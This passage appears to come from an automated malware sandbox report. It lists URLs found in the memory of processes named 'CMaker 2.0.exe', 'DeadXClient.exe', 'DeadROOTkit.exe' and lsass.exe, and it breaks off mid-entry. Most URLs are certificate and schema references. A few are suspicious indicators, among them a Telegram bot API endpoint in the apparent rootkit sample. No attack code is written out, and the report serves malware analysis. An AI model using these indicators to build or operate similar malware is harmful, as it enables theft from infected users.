00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2324334654.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3476204379.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631789089.000002D6F0C48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C018D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C018B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C018D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C018B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                        Source: lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                        Source: lsass.exe, 00000014.00000002.3484911785.000002D6F0DCD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641805218.000002D6F0DD3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327594784.000002D6F0DD9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.c
                        Source: powershell.exe, 00000009.00000002.2322203406.000001DE6485D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228213204.0000022D352A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                        Source: DeadXClient.exe, 00000006.00000002.3473575665.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2322203406.000001DE64631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323129454.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471566712.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
                        Source: CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                        Source: CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2238078413.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234701009.0000022D34CD0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244950158.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257114555.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
                        Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2245266079.0000022D352CF000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259518979.0000022D352CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
                        Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                        Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2245266079.0000022D352CF000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259518979.0000022D352CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                        Source: powershell.exe, 00000009.00000002.2322203406.000001DE6485D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: CMaker 2.0.exe, 00000005.00000003.2227719395.0000022D35311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
                        Source: CMaker 2.0.exe, 00000005.00000003.2172704229.0000022D34E09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172153148.0000022D34E04000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: CMaker 2.0.exe, 00000005.00000002.2256390299.0000022D34A4C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244995687.0000022D34A4B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229615812.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234727388.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                        Source: CMaker 2.0.exe, 00000005.00000003.2231786991.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236418298.0000022D34C9E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2235158831.0000022D34C9C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231226185.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                        Source: CMaker 2.0.exe, 00000005.00000003.2172704229.0000022D34E09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172194945.0000022D34A94000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172153148.0000022D34E04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                        Source: CMaker 2.0.exe, 00000005.00000003.2172704229.0000022D34E09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172153148.0000022D34E04000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                        Source: CMaker 2.0.exe, 00000005.00000003.2232058753.0000022D3527F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2242336196.0000022D35282000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2245417643.0000022D35282000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2246505041.0000022D35296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
                        Source: CMaker 2.0.exe, 00000005.00000003.2232058753.0000022D3527F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2242336196.0000022D35282000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2245417643.0000022D35282000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2246505041.0000022D35296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps.=
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                        Source: CMaker 2.0.exe, 00000005.00000003.2228708764.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2233681929.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228000312.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2235010705.0000022D34E20000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34E1B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232397966.0000022D34E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                        Source: powershell.exe, 00000009.00000002.2322203406.000001DE64631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: 1.exe, 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: https://api.telegram.org/bot
                        Source: powershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation/
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security/
                        Source: CMaker 2.0.exe, 00000005.00000002.2256204504.0000022D34840000.00000004.00001000.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2260388566.0000022D35834000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.botghost.com/api/public/tools/user_lookup/1077300934692049067
                        Source: CMaker 2.0.exe, 00000005.00000002.2260388566.0000022D35834000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.botghost.com/api/public/tools/user_lookup/10773009346920490670D
                        Source: CMaker 2.0.exe, 00000005.00000002.2256204504.0000022D34840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.botghost.com/api/public/tools/user_lookup/10773009346920490670Y
                        Source: CMaker 2.0.exe, 00000005.00000003.2172273654.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231869727.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172905632.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257514118.0000022D34DEC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175839153.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229086639.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2243720980.0000022D34DE4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2243030617.0000022D34DCA000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232613398.0000022D34DBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2237820216.0000022D34DC3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 